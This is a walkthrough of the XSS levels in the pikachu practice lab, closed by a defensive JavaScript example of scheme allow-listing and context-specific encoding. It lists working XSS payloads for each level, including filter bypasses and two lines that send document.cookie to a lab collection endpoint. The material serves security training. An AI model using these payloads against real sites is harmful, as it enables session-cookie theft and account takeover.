pikachu XSS section quick walkthrough
Contents
- pikachu XSS section quick walkthrough
- Reflected XSS (GET)
- Reflected XSS (POST)
- Stored XSS
- DOM XSS and DOM XSS-X
- Blind XSS
- XSS filtering
- XSS and htmlspecialchars
- XSS in href output
- XSS in JS output
Reflected XSS (GET)
payload:
</p><script>alert(1)</script><p>
Reflected XSS (POST)
payload:
</p><script>var cookie = document.cookie;alert(cookie);</script><p>
Stored XSS
payload:
<script>var cookie = document.cookie;alert(cookie);</script>
DOM XSS and DOM XSS-X
payload:
javascript:`${alert(1)}`
javascript:alert(2)
javascript:var cookie = document.cookie;alert(cookie);
Blind XSS
First, a note on how the XSS backend works: if a request is sent to http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie=value,
the backend writes one cookie record, which simulates the process of an XSS attack stealing a user's cookie.
payload:
<script>document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie</script>
XSS filtering
Uppercase tags bypass the filter
payload:
<SCRIPT>var cookie = document.cookie;alert(cookie);</SCRIPT>
XSS and htmlspecialchars
Avoid special characters: the javascript: URL below contains none of the characters that htmlspecialchars encodes
payload:
javascript:var cookie = document.cookie;alert(cookie);
XSS in href output
payload:
javascript:document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie
After clicking the <a> link, the backend has a cookie record
XSS in JS output
payload:
'</script><script>alert(1)</script>
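The htmlspecialchars, href-output and JS-output levels above all fail for the same reason: HTML entity encoding only protects the HTML-body context. The following is an added defensive example, not code from the pikachu project, showing the checks that close those three levels: a URL scheme allow-list for href values and JS-string encoding for values printed inside a script block (the function and variable names are assumed for illustration).

```javascript
// Added defensive example (not from the pikachu project). HTML entity encoding
// alone does not stop a javascript: href or a </script> breakout, so each
// output context needs its own encoder or check.

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

// Equivalent of PHP htmlspecialchars($s, ENT_QUOTES).
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Allow only http(s) absolute URLs or relative paths; any other scheme is rejected.
// Browsers ignore leading whitespace and embedded control characters when they
// parse the scheme, so those are stripped before the check (and case is folded).
function isSafeHref(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  const scheme = cleaned.match(/^([a-z][a-z0-9+.-]*):/);
  if (scheme) return scheme[1] === 'http' || scheme[1] === 'https';
  return !cleaned.startsWith('//'); // also reject protocol-relative URLs
}

// Hardened form of the "href output" level: scheme check first, then entity encoding.
function renderLink(url) {
  const href = isSafeHref(url) ? htmlEscape(url) : '#';
  return `<a href="${href}">link</a>`;
}

// Hardened form of the "JS output" level: the value lands inside a <script> block,
// so it is JSON-encoded and '<' is escaped so "</script>" cannot end the block early.
function renderScriptVar(value) {
  const literal = JSON.stringify(String(value)).replace(/</g, '\\u003c');
  return `<script>var ms = ${literal};</script>`;
}
```

The payloads listed in the href and JS output sections above are neutralised by renderLink and renderScriptVar respectively, while ordinary http(s) links and relative paths still render unchanged.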